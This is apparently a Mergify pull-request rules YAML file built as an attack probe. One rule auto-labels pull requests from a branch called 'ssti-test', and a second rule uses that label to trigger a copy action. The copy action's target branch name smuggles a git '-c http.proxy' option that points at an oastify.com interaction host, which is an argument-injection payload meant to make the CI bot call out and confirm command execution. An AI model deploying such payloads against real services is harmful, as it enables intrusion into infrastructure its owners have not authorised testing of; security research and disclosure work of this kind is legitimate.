pull_request_rules:
  - name: auto-label-trigger
    conditions:
      - head = ssti-test
    actions:
      label:
        add: [trigger-copy-91177efd]

  - name: copy-malicious-branch
    conditions:
      - label = trigger-copy-91177efd
    actions:
      copy:
        branches:
          - "-chttp.proxy=copyexec-17799691177efd.tmjvsptjwtmpfxy97hod40j5qwwnkf84.oastify.com"
        title: "COPY EXEC PROBE"

merge_protections_settings:
  reporting_method: check-runs
